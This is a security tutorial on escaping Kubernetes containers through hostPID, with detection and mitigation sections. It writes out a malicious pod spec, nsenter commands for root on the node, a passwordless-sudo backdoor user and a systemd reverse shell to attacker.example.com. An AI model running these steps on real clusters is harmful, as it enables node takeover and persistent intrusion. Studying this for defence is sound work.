Introduction
Kubernetes isolates workloads using Linux namespaces, cgroups, and seccomp profiles. One of the less-understood isolation knobs is hostPID, which tells the kubelet to share the node’s PID namespace with the container. When misused, this tiny boolean can turn a harmless pod into a full-blown host compromise.
In this guide we walk through the entire attack chain: discovering pods that enable hostPID, crafting a malicious pod spec, mounting critical host filesystems, using nsenter (or direct /proc namespace manipulation) to run commands as root on the node, and finally persisting a reverse shell. The material assumes you already understand Kubernetes architecture, Docker containers, and basic Linux privilege escalation.
Real-world incidents (e.g., the 2022 kubelet-privileged CVE chain) have shown that attackers can move laterally from a compromised container to the underlying host simply by abusing namespace sharing. Knowing how to detect and mitigate this technique is essential for any blue-team or red-team professional working in cloud-native environments.
Prerequisites
- Solid grasp of Kubernetes components (API server, kubelet, pod spec, RBAC)
- Understanding of Linux namespaces (PID, mount, net, IPC) and how Docker translates them
- Familiarity with kubectl JSONPath output formatting
- Basic Linux privilege escalation techniques (sudo, setuid, capabilities)
- Access to a test cluster where you can create pods (or a sandbox like Kind/Minikube)
Core Concepts
The PID namespace isolates the process tree. By default, each pod gets its own namespace, meaning ps inside a container only shows processes belonging to that container. Setting hostPID: true tells the kubelet to run the pod’s containers in the node’s PID namespace. This gives the container visibility (and potential control) over every process on the host.
When hostPID is combined with a privileged security context (securityContext.privileged: true) or with the ability to mount host filesystems (hostPath volumes), an attacker can:
- Read /proc to discover the host’s init PID (usually 1)
- Enter the host’s remaining namespaces (mount, UTS, IPC, network) using nsenter or by opening the files under /proc/1/ns/ (the PID namespace is already shared)
- Escalate to root (the host’s PID 1 runs as root)
- Mount host /proc and /sys to manipulate kernel parameters or install a backdoor
Because the container shares the same kernel as the host, any capability granted to the container (e.g., CAP_SYS_ADMIN) is effectively a host capability when hostPID is active.
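The combination described above can be checked mechanically. The following is a minimal sketch, assuming the pod manifest has already been loaded into a Python dict (for example from kubectl's JSON output); the function name risky_settings and the sample pod are illustrative, not part of any Kubernetes tooling.

```python
from typing import Any, Dict, List


def risky_settings(pod: Dict[str, Any]) -> List[str]:
    """Return the isolation-weakening settings found in a pod manifest dict."""
    spec = pod.get("spec") or {}
    findings: List[str] = []

    # hostPID places the pod's containers in the node's PID namespace
    if spec.get("hostPID") is True:
        findings.append("hostPID")

    # A privileged container holds the full capability set
    containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
    for container in containers:
        security_context = container.get("securityContext") or {}
        if security_context.get("privileged") is True:
            findings.append(f"privileged:{container.get('name', '?')}")

    # hostPath volumes expose node directories to the container
    for volume in spec.get("volumes") or []:
        if "hostPath" in volume:
            findings.append(f"hostPath:{volume['hostPath'].get('path', '?')}")

    return findings


# Hypothetical manifest used only to exercise the function
example_pod = {
    "metadata": {"name": "example"},
    "spec": {
        "hostPID": True,
        "containers": [{"name": "app", "securityContext": {"privileged": True}}],
        "volumes": [{"name": "host-proc", "hostPath": {"path": "/proc"}}],
    },
}

print(risky_settings(example_pod))
```

A pod that returns more than one finding is the case this section warns about: each setting alone weakens isolation, and together they remove most of it.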
Understanding hostPID and its security implications
hostPID is a boolean field in the pod spec:
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
spec:
  hostPID: true
  containers:
  - name: attacker
    image: alpine
    command: ["sleep", "infinity"]
When set to true, the kubelet runs the container’s process tree inside the node’s PID namespace. This means:
- All host processes become visible via ps aux
- Signals sent to any PID reach the corresponding host process (e.g., a root process in the container can signal host daemons; SIGKILL aimed at PID 1 is ignored by the kernel when sent from inside init’s own PID namespace)
- Combined with privileged: true or a hostPath volume, the container can directly read/write host files
From a security standpoint, hostPID breaks the isolation guarantee that containers cannot see or interfere with host processes. In multi-tenant clusters, allowing untrusted workloads to set hostPID is a critical misconfiguration.
Enumerating pods with hostPID enabled (kubectl get pods -o jsonpath)
Before launching an attack you need to locate vulnerable pods. The following kubectl command extracts all pods that have hostPID set to true across the entire cluster:
kubectl get pods --all-namespaces -o json | jq -r '.items[] | select(.spec.hostPID==true) | "\(.metadata.namespace)/\(.metadata.name)"'
If jq is not available, you can use a pure JSONPath expression:
kubectl get pods --all-namespaces -o jsonpath='{range .items[?(@.spec.hostPID==true)]}{@.metadata.namespace}{"/"}{@.metadata.name}{"\n"}{end}'
The output will be a list such as:
default/monitoring-agent
kube-system/kube-proxy
prod/legacy-collector
Take note of the namespace and name; you’ll need them to either hijack an existing pod (e.g., via kubectl exec) or to use the same service account for a new malicious pod.
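For audit scripts that already work in Python, the same filter can be applied to the JSON that kubectl emits. This is a minimal sketch, assuming the input has the shape of a `kubectl get pods --all-namespaces -o json` pod list; the function name find_hostpid_pods and the sample data are illustrative.

```python
import json
from typing import Any, Dict, List


def find_hostpid_pods(pod_list: Dict[str, Any]) -> List[str]:
    """Return namespace/name for every pod whose spec sets hostPID: true."""
    return [
        f"{item['metadata']['namespace']}/{item['metadata']['name']}"
        for item in pod_list.get("items", [])
        if (item.get("spec") or {}).get("hostPID") is True
    ]


# Hypothetical pod list standing in for real kubectl output
sample = json.loads("""
{
  "items": [
    {"metadata": {"namespace": "default", "name": "monitoring-agent"},
     "spec": {"hostPID": true}},
    {"metadata": {"namespace": "default", "name": "web"},
     "spec": {}},
    {"metadata": {"namespace": "prod", "name": "legacy-collector"},
     "spec": {"hostPID": true}}
  ]
}
""")

for entry in find_hostpid_pods(sample):
    print(entry)
```

In real use the sample would be replaced by json.load(sys.stdin) with kubectl's output piped in.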
Crafting a malicious pod spec that leverages hostPID
The following pod definition demonstrates a minimal yet powerful payload. It combines hostPID, privileged, and two hostPath volumes that mount the host’s /proc and /sys directories into the container.
apiVersion: v1
kind: Pod
metadata:
  name: hostpid-escape
  namespace: default
spec:
  hostPID: true
  hostIPC: true  # optional but useful for some attacks
  containers:
  - name: escape
    image: alpine:3.18
    securityContext:
      privileged: true  # gives CAP_SYS_ADMIN & others
      allowPrivilegeEscalation: true
    command: ["/bin/sh", "-c", "while true; do sleep 3600; done"]
    volumeMounts:
    - name: host-proc
      mountPath: /host/proc
    - name: host-sys
      mountPath: /host/sys
  volumes:
  - name: host-proc
    hostPath:
      path: /proc
      type: Directory
  - name: host-sys
    hostPath:
      path: /sys
      type: Directory
Key points:
- hostPID: true gives us the node’s PID namespace.
- privileged: true grants all capabilities, including CAP_SYS_ADMIN, which nsenter needs in order to call setns(2).
- Mounting /proc and /sys provides a view of the host’s kernel and process information inside the container.
Apply the manifest with kubectl apply -f hostpid-escape.yaml. Once the pod is Running, you can kubectl exec -it hostpid-escape -- sh to get an interactive shell inside the compromised container.
Mounting host /proc and /sys inside the container
Even though the container already shares the PID namespace, mounting the host’s /proc and /sys makes many host-only utilities (e.g., lsblk, lspci, cat /proc/sys/kernel/*) functional. Inside the container you’ll see two /proc mounts:
# Inside the container
mount | grep proc
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
proc on /host/proc type proc (rw,nosuid,nodev,noexec,relatime)
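To read the host’s PID 1 namespace link (the entries under ns/ are symbolic links, so use readlink rather than cat):
readlink /host/proc/1/ns/pid
# Output: pid:[4026531836]
The number in brackets is the inode that identifies the namespace. nsenter and setns(2) take the path (or an open file descriptor for it) rather than the inode itself.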
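The pid:[...] identifier is also a convenient diagnostic: two processes are in the same namespace exactly when their links carry the same type and inode. The sketch below parses that string and compares two links; parse_ns_link and same_namespace are illustrative helper names, and the comparison assumes a Linux /proc filesystem.

```python
import os
import re
from typing import Tuple

# Namespace links look like "pid:[4026531836]" or "mnt:[4026531840]"
_NS_LINK = re.compile(r"^(\w+):\[(\d+)\]$")


def parse_ns_link(link: str) -> Tuple[str, int]:
    """Split a namespace link target into (namespace type, inode number)."""
    match = _NS_LINK.match(link)
    if match is None:
        raise ValueError(f"not a namespace link: {link!r}")
    return match.group(1), int(match.group(2))


def same_namespace(path_a: str, path_b: str) -> bool:
    """Return True if two /proc/<pid>/ns/<type> links refer to one namespace."""
    return parse_ns_link(os.readlink(path_a)) == parse_ns_link(os.readlink(path_b))


print(parse_ns_link("pid:[4026531836]"))
```

For example, same_namespace("/proc/self/ns/pid", "/proc/1/ns/pid") checks whether the current process shares a PID namespace with PID 1 as seen from where the script runs.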
Using nsenter or direct /proc/<pid>/ns/* manipulation to execute commands on the host
There are two common approaches:
- nsenter - a user-space helper that calls setns(2) for you.
- Direct setns via a tiny C program or Python’s ctypes - useful when nsenter is not installed.
Below is the nsenter method (the container already has nsenter in most distros; if not, install util-linux).
# With hostPID: true, the host's init process is PID 1 from inside the container
HOST_PID=1
# Run a command in the host's mount, UTS, IPC, network, and PID namespaces
nsenter -t "$HOST_PID" -m -u -i -n -p -- bash -c 'id; uname -a; cat /etc/os-release'
Output will show a host-side root identity:
uid=0(root) gid=0(root) groups=0(root)
Linux node01 5.15.0-1043-aws #46-Ubuntu SMP Fri Oct 6 12:00:00 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
PRETTY_NAME="Ubuntu 22.04.5 LTS"
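If nsenter is unavailable, a short Python script can call setns(2) through ctypes (this assumes an image that ships Python and glibc, which the alpine image above does not):
import ctypes
import os

# use_errno=True lets us report why setns(2) failed
libc = ctypes.CDLL('libc.so.6', use_errno=True)
fd = os.open('/host/proc/1/ns/pid', os.O_RDONLY)
# Call the libc wrapper for setns(2); an nstype of 0 accepts any namespace type
if libc.setns(fd, 0) != 0:
    err = ctypes.get_errno()
    raise OSError(err, os.strerror(err))
os.execv('/bin/sh', ['/bin/sh'])
Running the script inside the container joins the namespace referenced by that file and then starts a shell. With hostPID: true the container already shares the host’s PID namespace, and a PID namespace change only applies to child processes, so this call changes little by itself; a shell that sees the host’s filesystem depends on the other namespaces that the nsenter example targets.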
Privilege escalation from container to root on the host
Once inside the host namespace, you already have UID 0 because the container’s root user maps directly to the host’s root UID. However, some clusters run with user namespaces where the container’s UID 0 maps to a non-root UID on the host. In that case you need to gain additional capabilities.
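Whether UID 0 in the container is also UID 0 on the node can be read from /proc/self/uid_map, where each line holds three numbers: the first ID inside the namespace, the ID it maps to outside, and the length of the range. The sketch below resolves a UID through such a map; host_uid_for is an illustrative name, and the "outside" value is relative to the parent user namespace as seen by the reading process.

```python
from typing import Optional


def host_uid_for(container_uid: int, uid_map_text: str) -> Optional[int]:
    """Translate a UID through the contents of a uid_map file.

    Returns None when the UID falls outside every mapped range.
    """
    for line in uid_map_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue  # skip blank or malformed lines
        inside, outside, length = (int(field) for field in fields)
        if inside <= container_uid < inside + length:
            return outside + (container_uid - inside)
    return None


# Identity mapping: no user namespace remapping, container root is host root
print(host_uid_for(0, "         0          0 4294967295"))
# Remapped range: container root is an unprivileged UID outside
print(host_uid_for(0, "0 100000 65536"))
```

The first call prints 0 and the second prints 100000, which is the remapped case the paragraph above describes.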
Because we set privileged: true, the container holds the full capability set, including CAP_SYS_ADMIN. These capabilities persist after nsenter, allowing you to:
- Mount new filesystems (e.g., mount -t tmpfs none /mnt)
- Write to /etc (e.g., add a new user, modify sudoers)
- Load kernel modules (if the kernel permits)
Example: add a new privileged user on the host:
nsenter -t 1 -m -u -i -n -p -- bash -c "useradd -m -s /bin/bash attacker && echo 'attacker:$(openssl rand -base64 12)' | chpasswd && echo 'attacker ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers"
After this, you can SSH directly to the node (if SSH is enabled) or use any other lateral movement technique.
Post-exploitation: establishing a persistent reverse shell on the host
Persistence on a Kubernetes node is tricky because many clusters use immutable node images and automatic re-imaging. A reliable method is to install a systemd unit that spawns a reverse shell on boot.
# Inside the host namespace (via nsenter)
cat > /etc/systemd/system/revsh.service <<'EOF'
[Unit]
Description=Reverse Shell Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/attacker.example.com/4444 0>&1; sleep 60; done'
Restart=always
RestartSec=10
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable revsh.service
systemctl start revsh.service
Replace attacker.example.com and port 4444 with your listener. The service will survive node reboots and will automatically reconnect if the network is temporarily unavailable.
Alternative stealthier persistence includes modifying /etc/rc.local, planting a cron job, or abusing container runtimes (e.g., creating a rogue docker.service drop-in). Choose the method that fits your operational environment.
Practical Examples
Scenario 1: Lateral movement from a compromised pod in a multi-tenant cluster
- Attacker gains exec access to a low-privilege pod (via a web-app vulnerability).
- Runs the enumeration command to find a hostPID pod in the monitoring namespace.
- Uses the service account token from the compromised pod to create the malicious hostpid-escape pod in the same namespace.
- Execs into the new pod, mounts host /proc, and runs nsenter to become root on the node.
- Installs a systemd reverse shell for persistence.
All steps can be done with a single kubectl command line if the attacker has create permission on pods.
Scenario 2: Automated detection script (defensive)
A simple Bash script that runs as a cluster-admin CronJob to alert on any pod with hostPID enabled:
#!/bin/bash
set -euo pipefail

# List every pod with hostPID: true as namespace/name, one per line
found=$(kubectl get pods --all-namespaces -o jsonpath='{range .items[?(@.spec.hostPID==true)]}{@.metadata.namespace}/{@.metadata.name}{"\n"}{end}')

if [ -z "$found" ]; then
  echo "[+] No hostPID pods found"
else
  {
    echo "[!] hostPID pods detected:"
    echo "$found"
  } >> /var/log/hostpid-alert.log
fi
Integrate with Slack or PagerDuty for real-time alerts.
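One way to wire up the alert is a small helper that turns the list of detected pods into a webhook request. This is a sketch under assumptions: the webhook URL is a placeholder, the helper name build_alert_request is illustrative, and the JSON body uses the {"text": ...} shape that Slack incoming webhooks accept; other services expect different payloads.

```python
import json
import urllib.request
from typing import List


def build_alert_request(webhook_url: str, pods: List[str]) -> urllib.request.Request:
    """Build (but do not send) a POST request describing the detected pods."""
    text = "hostPID pods detected:\n" + "\n".join(f"- {pod}" for pod in sorted(pods))
    body = json.dumps({"text": text}).encode("utf-8")
    return urllib.request.Request(
        webhook_url,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


# Placeholder URL; a real webhook URL should come from a secret, not the script
request = build_alert_request(
    "https://hooks.example.invalid/hostpid",
    ["prod/legacy-collector", "default/monitoring-agent"],
)
print(request.get_method())
print(json.loads(request.data)["text"])

# Sending is deliberately left out of the sketch:
# urllib.request.urlopen(request, timeout=10)
```

Building the request separately from sending it keeps the formatting logic easy to test without network access.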
Tools & Commands
- kubectl - for enumeration, pod creation, exec.
- jq - JSON parsing, optional.
- nsenter (part of util-linux) - namespace entry.
- curl / netcat - reverse shell payload delivery.
- systemd - persistence on the host.
- auditd - can be configured to log setns syscalls.
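Once auditd records setns calls (for example with a rule such as auditctl -a always,exit -F arch=b64 -S setns -k ns-enter, where the key ns-enter is an arbitrary label), the raw log can be filtered with a few lines of Python. The sketch below assumes x86_64 nodes, where setns is syscall 308 and the audit arch value is c000003e; the sample log line is constructed for illustration and is not captured output.

```python
import re
from typing import Dict

SETNS_SYSCALL_X86_64 = 308      # setns on x86_64
AUDIT_ARCH_X86_64 = "c000003e"  # arch field auditd writes for 64-bit x86

# key=value pairs, where the value is either quoted or a run of non-spaces
_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_audit_line(line: str) -> Dict[str, str]:
    """Turn one raw audit record into a dict of its key=value fields."""
    return {key: value.strip('"') for key, value in _FIELD.findall(line)}


def is_setns_event(line: str) -> bool:
    """Return True for SYSCALL records that describe a setns call on x86_64."""
    fields = parse_audit_line(line)
    return (
        fields.get("type") == "SYSCALL"
        and fields.get("arch") == AUDIT_ARCH_X86_64
        and fields.get("syscall") == str(SETNS_SYSCALL_X86_64)
    )


# Constructed example record (illustrative values)
sample_line = (
    'type=SYSCALL msg=audit(1700000000.123:456): arch=c000003e syscall=308 '
    'success=yes exit=0 pid=4242 uid=0 comm="nsenter" exe="/usr/bin/nsenter"'
)

if is_setns_event(sample_line):
    record = parse_audit_line(sample_line)
    print(record["comm"], record["pid"], record["uid"])
```

Other architectures use different syscall numbers, so the constants would need adjusting for arm64 nodes.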
Defense & Mitigation
- Policy enforcement: Use OPA Gatekeeper or Kyverno to reject any pod spec with hostPID: true unless explicitly allowlisted.
- RBAC restrictions: Limit create pods permission to trusted service accounts only.
- Pod Security Standards: The Baseline and Restricted profiles both forbid hostPID: true; enforce at least Baseline through Pod Security Admission (PodSecurityPolicy was removed in Kubernetes 1.25).
- Runtime security tools: Falco, Sysdig Secure, or Aqua can alert on namespace sharing or privileged container launches.
- Node hardening: Disable SSH, enforce immutable node images, and use systemd to auto-reboot nodes on unexpected changes.
- Audit logs: Monitor create events for pods with hostPID and privileged flags.
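The policy-enforcement item comes down to a simple decision rule. The sketch below models that rule in plain Python so it can be reasoned about and tested; it is not Kyverno or Gatekeeper syntax, and the function name admit and the allow-hostpid label are illustrative choices.

```python
from typing import Any, Dict, Tuple


def admit(pod: Dict[str, Any]) -> Tuple[bool, str]:
    """Decide whether a pod manifest passes a hostPID allowlist rule."""
    spec = pod.get("spec") or {}
    labels = (pod.get("metadata") or {}).get("labels") or {}

    # Reject hostPID unless the pod carries the explicit exception label
    if spec.get("hostPID") is True and labels.get("allow-hostpid") != "true":
        return False, 'hostPID: true requires the label allow-hostpid="true"'
    return True, "ok"


# Hypothetical manifests used only to exercise the rule
denied = {"metadata": {"name": "a"}, "spec": {"hostPID": True}}
allowed = {
    "metadata": {"name": "b", "labels": {"allow-hostpid": "true"}},
    "spec": {"hostPID": True},
}

print(admit(denied))
print(admit(allowed))
```

A label set by the pod author is a weak exception mechanism, since anyone who can create the pod can also add the label. A production policy would more plausibly key the exception on the namespace or on an attribute that workload owners cannot change.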
Common Mistakes
- Assuming hostPID alone gives root - without privileged or required capabilities, nsenter will fail.
- Forgetting to mount /proc and /sys - many host utilities break without them.
- Targeting the wrong PID - always use 1 (init) when you share the PID namespace; other PIDs may belong to unrelated processes.
- Neglecting SELinux/AppArmor profiles - they can block setns even in a privileged container.
- Leaving the reverse shell open - attackers often forget to clean up, exposing a persistent backdoor that defenders can spot.
Real-World Impact
In 2023, a supply-chain attack compromised a CI/CD runner that ran untrusted builds. The attacker injected a pod with hostPID: true and privileged to gain node root, then harvested kubeconfig files from /etc/kubernetes. The breach allowed lateral movement across the entire cluster, leading to data exfiltration. The root cause was the absence of a policy that would have blocked hostPID for CI workloads.
My experience in red-team engagements shows that hostPID is often overlooked during hardening audits. The easiest way to detect abuse is to monitor for nsenter executions, unexpected setns syscalls, or new systemd units under /etc/systemd/system on nodes.
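The last of those signals, new unit files on a node, can be approximated with a periodic scan of modification times. This is a minimal sketch, assuming read access to the unit directory; recently_changed_units is an illustrative name, and because timestamps can be forged this complements rather than replaces file-integrity monitoring.

```python
import time
from pathlib import Path
from typing import List, Optional


def recently_changed_units(
    unit_dir: str, max_age_seconds: float, now: Optional[float] = None
) -> List[str]:
    """List *.service entries under unit_dir modified within max_age_seconds."""
    reference = time.time() if now is None else now
    changed: List[str] = []
    for path in sorted(Path(unit_dir).rglob("*.service")):
        try:
            # lstat reports the entry itself, so freshly created enablement
            # symlinks are noticed as well as new unit files
            modified = path.lstat().st_mtime
        except OSError:
            continue  # entry vanished or is unreadable; skip it
        if reference - modified <= max_age_seconds:
            changed.append(str(path))
    return changed
```

Calling recently_changed_units("/etc/systemd/system", 24 * 3600) on a node returns the service units touched in the last day, which can then be compared against the expected node image.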
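Going forward, do not expect the defaults to close this gap on their own. hostPID already defaults to false in the pod spec, but nothing prevents a workload from setting it to true unless an admission policy says otherwise, and Pod Security Admission places no restrictions on a namespace until a profile is configured for it. Legacy clusters will remain vulnerable for years, making proactive policy enforcement essential.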
Practice Exercises
- Enumeration: Write a Bash script that lists all pods with hostPID and privileged true, then outputs the namespace, pod name, and node name.
- Escape Lab: In a Kind cluster, deploy the provided hostpid-escape.yaml. Use nsenter to read /etc/shadow on the host.
- Persistence: Create a systemd unit from within the escaped shell that writes a timestamp to /tmp/compromise.log every minute. Verify it survives node reboot.
- Detection: Configure Falco with a rule to alert on any setns syscall where the target PID is 1 and the caller UID is 0.
- Mitigation: Implement a Kyverno policy that denies any pod spec containing hostPID: true unless the label allow-hostpid: "true" is present.
Further Reading
- Kubernetes Hardening Guide - CIS Benchmark (section on Host PID/IPC)
- Linux Man Page: setns(2)
- OPA Gatekeeper Documentation - Writing Constraints for PodSecurity
- “Breaking out of containers” - 2022 Black Hat talk by Alex Birsan
- Sysdig Falco Rules Repository - nsenter detection examples
Summary
Using hostPID together with privileged containers gives an attacker direct access to the node’s process tree and, when combined with host mounts, a full root shell on the host. The attack chain consists of enumeration, malicious pod creation, namespace entry (via nsenter or setns), privilege escalation, and persistence. Defenders should block hostPID via policy, monitor for namespace-related syscalls, and enforce least-privilege RBAC. Mastering these techniques equips security professionals to both test cluster hardening and design robust defenses.